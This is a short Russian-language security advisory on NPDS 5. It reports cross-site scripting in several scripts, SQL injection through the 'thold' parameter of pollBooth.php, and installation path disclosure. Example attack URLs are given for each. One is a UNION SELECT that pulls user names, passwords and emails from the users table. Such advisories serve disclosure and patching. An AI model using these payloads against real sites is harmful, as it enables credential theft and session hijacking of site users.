Программа: NPDS 5
Обнаруженные уязвимости позволяют
удаленному пользователю произвести XSS
нападение и выполнить произвольные SQL
команды в базе данных приложения.
Межсайтовый скриптинг возможен из-за
некорректной обработки входных данных в
различных сценариях. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольный
HTML сценарий в браузере жертвы в контексте
безопасности уязвимого сайта.
Примеры:
http://[target]/narval/search.php?query="><hr>
http://[target]/narval/pollBooth.php?op=results& thold=&mode=&order="<hr>&pollID=2
http: //[target]/narval/sdv.php?sdv=<script>alert( )</script>
http://[target]/narval/memberslist.php?letter=& sortby="[XSS]&list=
http://[target]/narval/user.php?op=userinfo &uname=[xss]
http://[target]/narval/powerpack.php?op= instant_message&to_userid=[XSS]
http://[target]/narval/faq.php?myfaq=yes& id_cat=99&categories=[xss]
SQL-инъекция возможна из-за недостаточной
фильтрации данных в параметре thold сценария 'pollBooth.php'.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольные SQL команды в базе данных
приложения.
Пример:
http://[target]/narval/pollBooth.php?op=results&thold=0 UNION SELECT
name,pass, email, user_from, user_journal, user_msnm, femail, uid, uname,
commentmax,theme, user_viewemail FROM users
Удаленный пользователь может с помощью
специально сформированного URL получить
данные об установочной директории
приложения.
Пример:
http://[target]/narval/pollBooth.php?op=results&thold=[' ]&mode=thread&
order=0&pollID=2